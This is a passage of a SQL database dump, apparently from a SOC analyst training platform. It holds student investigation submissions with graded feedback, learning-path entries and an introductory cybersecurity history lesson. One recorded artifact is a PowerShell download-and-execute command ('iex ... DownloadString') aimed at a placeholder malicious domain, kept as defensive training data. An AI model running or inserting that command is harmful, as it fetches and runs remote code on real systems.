  `updated_at` datetime DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

-- --------------------------------------------------------

--
-- Table structure for table `investigations`
--

DROP TABLE IF EXISTS `investigations`;
CREATE TABLE `investigations` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `alert_id` int(11) NOT NULL,
  `status` varchar(50) DEFAULT 'investigating',
  `grade` int(11) DEFAULT NULL,
  `feedback` text DEFAULT NULL,
  `executive_summary` text DEFAULT NULL,
  `ai_summary` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  `ai_evaluation_scheduled_at` datetime DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `is_reported` tinyint(1) DEFAULT 0,
  `report_reason` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `investigations`
--

INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(27, 29, 221, 'investigating', NULL, NULL, '{\"verdict\":\"Benign\",\"executive_summary\":{\"report\":\"## Executive Report\\n**Date:** 23/12/2025\\n**Verdict:** Benign\\n\\n### Incident Overview\\nAlert triggered by suspicious activity classified as **Phishing**.\\n\\n### Key Findings & Artifacts\\n- IP: 203.0.113.5\\n- Hash: d41d8cd98f00b204e9800998ecf8427e\\n\\n### Incident Response\\nActions taken to mitigate the threat:\\nClose Alert (False Positive)\",\"conclusion\":\"This alert is classified as a Benign based on the following findings:\\n\\n1. The identified artifacts (203.0.113.5, d41d8cd98f00b204e9800998ecf8427e) were analyzed and determined to be inconclusive.\\n\\n2. Impact Assessment: No malicious activity was confirmed. This appears to be legitimate activity.\\n\\n3. Recommended Actions: No further action required. Alert can be safely closed.\"},\"artifacts\":[{\"type\":\"IP\",\"value\":\"203.0.113.5\",\"link\":\"\",\"score\":\"\"},{\"type\":\"Hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"link\":\"\",\"score\":\"\"}],\"analysis_answers\":{\"attack_category\":\"Phishing\",\"action_taken\":[\"Close Alert (False Positive)\"]},\"submitted_at\":\"2025-12-23T17:48:26.422Z\"}', '{\"verdict_correctness\":\"Incorrect\",\"key_findings\":\"The sending server was suspicious, which aligns with characteristics of phishing.\",\"missed_items\":[\"suspicious sending server\",\"potential phishing intention\"],\"strengths\":\"You made the effort to classify the attack category. Your initiative in closing the alert, assuming it was a false positive, shows you are thinking critically, even if the conclusion was incorrect.\"}', NULL, '2025-12-23 17:35:10', '2026-01-02 02:40:31', 1, '.'),
(28, 30, 221, 'investigating', NULL, NULL, NULL, NULL, '2025-12-24 00:24:17', '2025-12-23 21:17:17', '2025-12-23 21:17:17', 0, NULL),
(29, 30, 218, 'investigating', NULL, NULL, NULL, NULL, '2025-12-24 00:26:28', '2025-12-23 21:19:28', '2025-12-23 21:19:28', 0, NULL),
(30, 31, 221, 'investigating', NULL, NULL, NULL, NULL, '2025-12-24 04:28:45', '2025-12-24 01:20:45', '2025-12-24 01:20:45', 0, NULL),
(41, 36, 233, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2025-12-26T13:53:32.177Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The email sender domain is spoofed to look like a trusted entity. The URL in the email is a clear indicator of phishing, and the IP should be flagged as suspicious.\",\"missed_items\":[\"Analysis or actions taken\",\"Artifacts like URL and IP should be highlighted\",\"Executive summary\"],\"strengths\":\"The analyst correctly determined the appropriate verdict.\"}', NULL, '2025-12-26 13:51:38', '2026-01-02 02:40:31', 0, NULL),
(44, 41, 240, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2025-12-27T10:33:40.336Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The PowerShell command was identified as potentially malicious due to its encoded nature and execution with high integrity.\",\"missed_items\":[\"Analysis of the decoded command\",\"Summary and conclusion of findings\",\"Action plan or recommendation\"],\"strengths\":\"The analyst has successfully identified the event as suspicious, which is the main takeaway needed in incident response.\"}', NULL, '2025-12-27 10:31:24', '2026-01-02 02:40:31', 0, NULL),
(45, 41, 242, 'investigating', NULL, NULL, NULL, NULL, '2025-12-27 13:50:44', '2025-12-27 10:42:44', '2025-12-27 10:42:44', 0, NULL),
(46, 41, 241, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2025-12-27T10:44:02.144Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The analyst should have noted the use of PowerShell with Invoke-Expression to download a script from a questionable URL, indicative of potentially malicious activity.\",\"missed_items\":[\"Detailed analysis or actions taken\",\"Key artifacts such as the URL and file hash\"],\"strengths\":\"Correctly identified the event as a true positive.\"}', NULL, '2025-12-27 10:42:49', '2026-01-02 02:40:31', 0, NULL),
(47, 44, 166, 'investigating', NULL, NULL, NULL, NULL, '2025-12-28 00:05:00', '2025-12-27 21:00:00', '2025-12-27 21:00:00', 0, NULL),
(49, 48, 250, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"\",\"submitted_at\":\"2025-12-28T19:35:10.935Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The encoded PowerShell command decodes to \'echo This is a test.\', suggesting benign activity.\",\"missed_items\":[\"Decoded command content: echo This is a test.\",\"Proof of benign activity through decoded script\"],\"strengths\":\"Identified the activity as false positive correctly.\"}', NULL, '2025-12-28 19:33:42', '2026-01-02 02:40:31', 0, NULL),
(51, 54, 255, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":{\"report\":\"## Executive Report\\n**Date:** 1/3/2026\\n**Verdict:** True Positive\\n\\n### Incident Overview\\nAlert triggered by suspicious activity classified as **Insider Threat**.\\n\\n### Key Findings & Artifacts\\n- IP: 192.168.32.201\\n\\n### Incident Response\\nActions taken to mitigate the threat:\\nReset Credentials, Block IP / Domain, Isolate Host\",\"conclusion\":\"This alert is classified as a True Positive based on the following findings:\\n\\n1. The identified artifacts (192.168.32.201) were analyzed and determined to be malicious.\\n\\n2. Impact Assessment: The threat was confirmed. Immediate containment measures were taken to prevent lateral movement.\\n\\n3. Recommended Actions: Continue monitoring the affected systems, review access logs, and consider password resets for affected accounts.\"},\"artifacts\":[{\"type\":\"IP\",\"value\":\"192.168.32.201\",\"link\":\"\",\"score\":\"\"}],\"analysis_answers\":{\"attack_category\":\"Insider Threat\",\"action_taken\":[\"Reset Credentials\",\"Block IP / Domain\",\"Isolate Host\"]},\"submitted_at\":\"2026-01-03T16:55:43.995Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', NULL, '2025-12-29 21:35:43', '2026-01-03 16:56:44', 0, NULL),
(52, 54, 257, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"This alert is True Positive\\nDetection POWERSHELL-0012 correctly identified malicious activity, suspicious PowerShell execution and fileless malware pattern. Actions are warranted\",\"submitted_at\":\"2025-12-29T21:58:29.581Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Suspicious PowerShell execution with known malicious network communication.\",\"missed_items\":[\"Executive Summary\",\"Artifacts such as file hash and IP address\"],\"strengths\":\"Correctly identified the activity as malicious.\"}', NULL, '2025-12-29 21:46:51', '2026-01-02 02:40:31', 0, NULL),
(53, 54, 256, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"Alert is True Positive, its a known phishing URL, SEG saw the link is on a blacklist and quarantined the mail. The inbound e-mail bever reached the user\'s inbox. \",\"submitted_at\":\"2025-12-29T22:36:14.618Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The email contained a blacklisted URL linked to phishing, and the email was quarantined.\",\"missed_items\":[\"Actions Taken\",\"Analysis/Artifacts Found\",\"Headers\"],\"strengths\":\"Correctly identified the email as a phishing attempt and stated that it was quarantined.\"}', NULL, '2025-12-29 22:28:13', '2026-01-02 02:40:31', 0, NULL),
(59, 34, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"This is true positive , need to block IP address and hash \",\"submitted_at\":\"2025-12-31T13:11:32.499Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Key artifacts include the attachment hash \'3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\' and the source IP \'192.168.1.100\'.\",\"missed_items\":[\"attachment_hash\",\"source_ip\",\"analysis and actions taken\",\"executive summary\"],\"strengths\":\"Identified the incident as a true positive, accurately recognizing it as a phishing attempt.\"}', NULL, '2025-12-31 13:10:22', '2026-01-02 02:40:31', 0, NULL),
(60, 34, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"this is truepositive alert, end point has to isolate, block domain , hash etc. .\",\"submitted_at\":\"2025-12-31T14:34:55.159Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The execution of BlackEnergy malware, involvement of suspicious file and process, and the details such as file hash, IP addresses, and the user\'s action.\",\"missed_items\":[\"file_hash\",\"file_path\",\"internal_ip\",\"external_ip\",\"associated_action steps\"],\"strengths\":\"The analyst correctly identified the alert as a true positive.\"}', NULL, '2025-12-31 13:11:32', '2026-01-02 02:40:31', 0, NULL),
(65, 34, 270, 'investigating', NULL, NULL, NULL, NULL, NULL, '2025-12-31 14:34:55', '2025-12-31 14:34:55', 0, NULL),
(67, 34, 304, 'graded', 80, 'Good work, but there are areas for improvement.\n\nRecommended actions you missed: Reset Credentials, Collect Forensics, Escalate to Tier 2', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"block_hash\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"It is truepositive alert. We need to block URL/Doamin and IP address and hash. \",\"submitted_at\":\"2026-01-02T04:31:15.901Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"critical_artifacts\":[{\"type\":\"email\",\"value\":\"finance.partner@maliciousdomain.com\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"osint_verdict\":\"malicious\"},{\"type\":\"url\",\"value\":\"http://maliciousdomain.com/securelogin\",\"osint_verdict\":\"malicious\"},{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"osint_verdict\":\"malicious\"}]}', '2026-01-02 07:37:59', '2026-01-02 04:28:59', '2026-01-02 04:31:15', 0, NULL),
(68, 34, 305, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-02 04:31:15', '2026-01-02 04:31:15', 0, NULL),
(71, 34, 318, 'investigating', NULL, NULL, NULL, NULL, '2026-01-02 18:36:39', '2026-01-02 15:27:39', '2026-01-02 15:27:39', 0, NULL),
(75, 34, 316, 'investigating', NULL, NULL, NULL, NULL, '2026-01-02 18:52:14', '2026-01-02 15:43:14', '2026-01-02 15:43:14', 0, NULL),
(81, 34, 274, 'investigating', NULL, NULL, NULL, NULL, '2026-01-03 00:42:46', '2026-01-02 21:34:46', '2026-01-02 21:34:46', 0, NULL),
(82, 54, 318, 'graded', 75, 'Good work, but there are areas for improvement.\n\nRecommended actions you missed: Close Alert (False Positive)\nUnnecessary actions selected: Reset Credentials', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"reset_credentials\"],\"verdict\":\"false_positive\",\"conclusion\":\"Instigation confirmed benign activity on internal, known host \\\"internal-server\\\" (192.168.1.15). 15 failed login attempts to \\\"admin\\\" account on dst 192.168.1.100 were triggered by likely cause e.g., automated script misconfig, service account password expiry/rotation, or scheduled task with stale creds. No evidence of brute-force. Host verified clean via EDR scan/logs. Action taken (credential reset) was precautionary. No IOC\'s or anomalies post-review.\",\"submitted_at\":\"2026-01-03T17:06:09.611Z\"}', '{\"verdict\":\"False Positive\",\"recommended_actions\":[\"close_alert\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"192.168.1.15\",\"osint_verdict\":\"internal\"}]}', '2026-01-03 20:06:39', '2026-01-03 16:56:39', '2026-01-03 17:06:09', 0, NULL),
(83, 54, 315, 'graded', 100, 'Excellent investigation! You demonstrated strong analytical skills.', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"Host compromised: WORKSTATION-01 (10.0.02) affected user: Jane.doe, Malware Identified: malware.exe-has b194 linked to known enterprise-targeting campaign. Rapid threat intelligence VirusTotal scan confirmed malicious hash. Risk level high. Immediate response actions host Isolation: WORKSTATION-01 quarantined from network-prevented lateral movement and data exfiltration. Malware Blocking: Malware hash globally blacklisted across all enterprise endpoints, Forensic Capture: Memory and disk imaging performed to preserve evidence. \",\"submitted_at\":\"2026-01-03T17:19:44.573Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"critical_artifacts\":[{\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"osint_verdict\":\"malicious\"}]}', '2026-01-03 20:14:54', '2026-01-03 17:07:54', '2026-01-03 17:19:44', 0, NULL),
(84, 54, 249, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":{\"report\":\"## Executive Report\\n**Date:** 1/3/2026\\n**Verdict:** True Positive\\n\\n### Incident Overview\\nAlert triggered by suspicious activity classified as **Web Attack**.\\n\\n### Key Findings & Artifacts\\n- URL: http://maliciousdomain.com/script.ps1\\n- Command: \\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\')\\n- IP: 192.168.1.105\\n- Process: explorer.exe\\n\\n### Incident Response\\nActions taken to mitigate the threat:\\nIsolate Host, Block IP / Domain\",\"conclusion\":\"This alert is classified as a True Positive based on the following findings:\\n\\n1. The identified artifacts (http://maliciousdomain.com/script.ps1, \\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\'), 192.168.1.105, explorer.exe) were analyzed and determined to be malicious.\\n\\n2. Impact Assessment: The threat was confirmed. Immediate containment measures were taken to prevent lateral movement.\\n\\n3. Recommended Actions: Continue monitoring the affected systems, review access logs, and consider password resets for affected accounts.\"},\"artifacts\":[{\"type\":\"URL\",\"value\":\"http://maliciousdomain.com/script.ps1\",\"link\":\"\",\"score\":\"\"},{\"type\":\"Command\",\"value\":\"\\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\')\",\"link\":\"\",\"score\":\"\"},{\"type\":\"IP\",\"value\":\"192.168.1.105\",\"link\":\"\",\"score\":\"\"},{\"type\":\"Process\",\"value\":\"explorer.exe\",\"link\":\"\",\"score\":\"\"}],\"analysis_answers\":{\"attack_category\":\"Web Attack\",\"action_taken\":[\"Isolate Host\",\"Block IP / Domain\"]},\"submitted_at\":\"2026-01-03T17:35:55.420Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-01-03 20:31:08', '2026-01-03 17:21:08', '2026-01-03 17:36:55', 0, NULL),
(86, 49, 428, 'investigating', NULL, NULL, NULL, NULL, '2026-01-05 01:39:51', '2026-01-04 22:30:51', '2026-01-04 22:30:51', 0, NULL),
(87, 1, 476, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-05 03:22:25', '2026-01-05 03:22:25', 0, NULL),
(88, 34, 496, 'investigating', NULL, NULL, NULL, NULL, '2026-01-06 03:35:33', '2026-01-06 00:29:33', '2026-01-06 00:29:33', 0, NULL),
(89, 34, 476, 'graded', 86, 'Good work, but there are areas for improvement.\n\nRecommended actions you missed: Collect Forensics, Escalate to Tier 2\nConsider writing a more detailed conclusion.', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\",\"artifact_6\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"This alert is true positive. \",\"submitted_at\":\"2026-01-06T00:54:10.521Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"osint_verdict\":\"malicious\"},{\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"a4b9c78cb6f1a2b3d4e5f6a7b8c9d0e1\",\"osint_verdict\":\"malicious\"},{\"type\":\"filename\",\"value\":\"important_document.rtf\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-06 00:53:10', '2026-01-06 00:54:10', 0, NULL),
(90, 34, 477, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-06 00:54:10', '2026-01-06 00:54:10', 0, NULL),
(91, 1, 525, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-06 01:49:25', '2026-01-06 01:49:25', 0, NULL),
(92, 65, 244, 'investigating', NULL, NULL, NULL, NULL, '2026-01-06 10:10:49', '2026-01-06 07:00:49', '2026-01-06 07:00:49', 0, NULL),
(93, 1, 530, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-06 19:45:51', '2026-01-06 19:45:51', 0, NULL),
(94, 68, 530, 'graded', 95, 'Excellent investigation! You demonstrated strong analytical skills.\n\nUnnecessary actions selected: Reset Credentials\nAlways provide a conclusion explaining your verdict.', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-01-07T16:11:48.286Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.5\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"3a2f4e6d2b2a4f5c6f9e8b7e4c1d2f3e\",\"osint_verdict\":\"malicious\"},{\"type\":\"filename\",\"value\":\"ASUSUpdate.exe\",\"osint_verdict\":\"suspicious\"}]}', '2026-01-07 19:18:30', '2026-01-07 16:08:30', '2026-01-07 16:11:48', 0, NULL),
(95, 68, 531, 'graded', 100, 'Excellent investigation! You demonstrated strong analytical skills.\n\nUnnecessary actions selected: Reset Credentials, Escalate to Tier 2', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"This report summarizes the Malicious payload, identifying key strengths in our response and critical areas needing improvement to address evolving threats like.\\nSuccessfully contained simulated ransomware, but identified gaps in endpoint detection coverage on 15% of legacy devices.\\nWhile no data was lost, potential downtime could have impacted critical operations.\\nRecommendations for improvement:  1. Upgrade EDR on legacy systems; 2. Develop updated playbooks for data exfiltration; 3. Conduct quarterly phishing simulations. \",\"submitted_at\":\"2026-01-07T16:40:25.941Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.15\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-07 16:11:48', '2026-01-07 16:40:25', 0, NULL),
(96, 68, 532, 'graded', 100, 'Excellent investigation! You demonstrated strong analytical skills.\n\nUnnecessary actions selected: Escalate to Tier 2', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"This report summarizes the [Event Name], identifying key strengths in our response and critical areas needing improvement to address evolving threats like [Threat Type]\\\".\\nKey Findings: Backdoor was detected.\\nBusiness Impact: While no data was lost, potential downtime could have impacted critical operations.\\nRecommendations (POA&M): 1. Upgrade EDR on legacy systems; 2. Develop updated playbooks for data exfiltration; 3. Conduct quarterly phishing simulations. \",\"submitted_at\":\"2026-01-07T16:43:10.336Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"osint_verdict\":\"malicious\"},{\"type\":\"username\",\"value\":\"compromised_user\",\"osint_verdict\":\"suspicious\"},{\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-07 16:40:25', '2026-01-07 16:43:10', 0, NULL),
(97, 68, 533, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-07 16:43:10', '2026-01-07 16:43:10', 0, NULL),
(98, 34, 530, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-11 01:35:26', '2026-01-11 01:35:26', 0, NULL),
(99, 34, 546, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-11 01:38:00', '2026-01-11 01:38:00', 0, NULL),
(100, 34, 345, 'investigating', NULL, NULL, NULL, NULL, '2026-01-11 04:54:19', '2026-01-11 01:45:19', '2026-01-11 01:45:19', 0, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `investigation_notes`
--

DROP TABLE IF EXISTS `investigation_notes`;
CREATE TABLE `investigation_notes` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `alert_id` int(11) NOT NULL,
  `note` text NOT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `learning_paths`
--

DROP TABLE IF EXISTS `learning_paths`;
CREATE TABLE `learning_paths` (
  `id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `description` text DEFAULT NULL,
  `difficulty_level` enum('beginner','intermediate','advanced') NOT NULL,
  `estimated_hours` int(11) DEFAULT 0,
  `icon_url` varchar(255) DEFAULT NULL,
  `display_order` int(11) DEFAULT 0,
  `is_active` tinyint(1) DEFAULT 1,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `learning_paths`
--

INSERT INTO `learning_paths` (`id`, `title`, `description`, `difficulty_level`, `estimated_hours`, `icon_url`, `display_order`, `is_active`, `created_at`, `updated_at`) VALUES
(1, 'Pre-Security Fundamentals', 'Start your cybersecurity journey with essential IT and security foundations. Perfect for absolute beginners.', 'beginner', 120, NULL, 1, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07'),
(2, 'Security Operations Basics', 'Build practical security operations skills with hands-on log analysis, packet inspection, and threat detection.', 'intermediate', 180, NULL, 2, 1, '2025-12-26 02:43:16', '2025-12-26 15:49:18'),
(3, 'SOC Analyst Level 1', 'Master SIEM platforms, incident response, and become job-ready for SOC Analyst roles.', 'intermediate', 220, NULL, 3, 1, '2025-12-26 02:43:16', '2025-12-26 15:49:18'),
(4, 'Advanced SOC & Threat Hunting', 'Advanced threat hunting, malware analysis, and specialized security operations.', 'advanced', 160, NULL, 4, 1, '2025-12-26 02:43:16', '2025-12-26 15:49:18'),
(6, 'Threat Intelligence', 'Master the art of Cyber Threat Intelligence (CTI). Learn to collect, analyze, and disseminate intelligence to anticipate and prevent attacks.', 'intermediate', 40, NULL, 6, 1, '2025-12-29 13:30:44', '2025-12-29 13:30:44'),
(9, 'Alert Investigation Specialist', 'Master the art of investigating specific security alerts. Deep dive into EDR, SIEM, Network, and Email analysis tools.', 'beginner', 0, NULL, 3, 1, '2025-12-26 17:59:30', '2025-12-26 17:59:30');

-- --------------------------------------------------------

--
-- Table structure for table `lesson_content`
--

DROP TABLE IF EXISTS `lesson_content`;
CREATE TABLE `lesson_content` (
  `id` int(11) NOT NULL,
  `task_id` int(11) NOT NULL,
  `content` text NOT NULL,
  `content_type` enum('markdown','html') DEFAULT 'markdown',
  `reading_time_minutes` int(11) DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `lesson_content`
--

INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(1, 1, '## What is Cybersecurity?\n\n**Cybersecurity** is the practice of protecting systems, networks, and programs from digital attacks. These cyberattacks are usually aimed at accessing, changing, or destroying sensitive information; extorting money from users; or interrupting normal business processes.\n\n---\n\n### The Evolution of Hacking\nTo understand where we are, we must look at where we came from.\n\n#### 1. The Era of Phreaking (1970s)\nBefore computers were networked, hackers targeted **phones**. \"Phreakers\" like John Draper (Captain Crunch) used a toy whistle that emitted a 2600Hz tone. This tone tricked the AT&T phone switches into giving free long-distance calls.\n*   **Motivation**: Curiosity.\n\n#### 2. The Morris Worm (1988)\nRobert Morris wrote a script to gauge the size of the internet. A coding error made it propagate uncontrollably. It crashed 10% of the entire internet.\n*   **Impact**: The first conviction under the Computer Fraud and Abuse Act.\n\n#### 3. The Script Kiddie Era (1990s-2000s)\nTools became public. You didn\'t need to know C code; you just needed to download \"Sub7\" or \"Back Orifice\". Defacements of websites were common.\n*   **Motivation**: Fame / Notoriety.\n\n#### 4. The Era of Cybercrime (2010s-Present)\nHacking became a business. Organized crime groups (like Conti, LockBit) run \"Ransomware as a Service\". They have HR departments, helpdesks, and payroll.\n*   **Motivation**: Money. Trillions of dollars lost annually.\n\n#### 5. Cyber Warfare (State Sponsored)\nNations (US, China, Russia, Israel, Iran) use cyber tools for espionage and sabotage.\n*   **Stuxnet (2010)**: A worm that physically destroyed Iranian nuclear centrifuges. The first \"digital weapon\".\n\n---\n\n### Why is Cybersecurity Hard?\n1.  **The Defender\'s Dilemma**: A defender must be right 100% of the time. An attacker only needs to be right ONCE.\n2.  **Complexity**: Modern software has millions of lines of code. Bugs are inevitable.\n3.  **The Human Factor**: You can have a $1 Million Firewall, but if Dave in Accounting clicks a link that says \"Free iPhone\", you are breached.\n\n### Key Terminology\n*   **Threat**: The potential cause of an unwanted incident (e.g., A hacker, a hurricane).\n*   **Vulnerability**: A weakness in a system (e.g., Weak password, unpatched Windows).\n*   **Risk**: The likelihood of a Threat exploiting a Vulnerability. (`Risk = Threat x Vulnerability`).', 'markdown', 3, '2025-12-26 01:08:19', '2025-12-29 13:58:57'),
